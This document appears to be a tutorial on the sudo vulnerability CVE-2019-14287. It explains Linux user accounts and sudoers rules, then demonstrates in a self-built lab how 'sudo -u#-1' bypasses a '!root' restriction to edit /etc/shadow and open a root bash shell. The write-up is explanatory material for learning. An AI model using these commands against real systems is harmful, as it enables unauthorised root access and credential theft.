- Release date: 14th October 2019
- CVE ID: CVE-2019-14287
- Affected Versions: Versions prior to <= 1.8.28
Brief description of vulnerability
The security policy bypass vulnerability that allows users on a Linux system to execute commands as root, while the user permissions in the sudoers file explicitly prevents these commands from being run as root.
It can be executed by a user that has ALL permissions in the Runas specification. Which means they can execute commands as any or all users on the system.
This consequently allows users to run commands and tools as root by specifying the user id ( UID ) as -1 or the unsigned equivalent of -1: 4294967295
sudo -u#-1 /usr/bin/id or the unsigned equivalent of -1 sudo -u#4294967295 /usr/bin/id
Explanation of exploit
What is sudo?
sudo is a command that allows you to run scripts or programs that require administrative privileges. It stands for super user do.
You can also use the su (switch user) command to switch the superuser.
How to check sudo version installed?
sudo –version or sudo –version | grep version
How user information is stored in Linux
Each user account has a username, unique identifier (UID), group(GID), home directory, and the default shell to be used when the user logs in to the system.
All user account related information is stored in the passwd file, located in /etc/passwd
Passwords in the passwd file are encrypted and are therefore represented by an x.
The encrypted passwords for accounts are stored in the shadow file, located in /etc/shadow . The shadow file can only be accessed by the root user.
Structure of user account
The first user in the passwd file is the root account
The root account always has a UID of 0
System accounts have a UID of less than 1000 while user accounts have UID >= 1000
The sudoers file
The sudoers file contains all the permissions for users and groups on a Linux system. it is found in /etc/sudoers
The sudoers file can be accessed and modified securely by using visudo.
visudo is a tool that allows you to access and make changes to the sudoers file securely, it does this by ensuring that only one user is editing the sudoers file and by checking for logical errors.
We will use visudo to demonstrate the exploit.
This will depend on user permissions in regards to commands specified within the sudoers file.
- The user requires sudo privileges that allow running of commands with user ID’s – We will be setting this up in the sudoers file
- sudo version <= 1.8.28
Create user on system.
Modify the sudoers file with visudo.
Provide the user with sudo privileges and specify the commands that can be run.
alexis ALL=(ALL, !root) /usr/bin/vi
- You can also specify a command alias.
Cmnd_Alias VIM = /usr/bin/vi
- After setting up permissions, log in as user alexis and run command:
sudo -u#-1 vi /etc/shadow
- To confirm this try running it without specifying the UID.
sudo vi /etc/shadow
This confirms that the UID -1 bypasses the permissions and allows for command execution.
You can also confirm this by using the id command.
- If a user can run any command then we can get a bash shell as root user
alexis ALL=(ALL, !root) ALL
sudo -u#-1 bash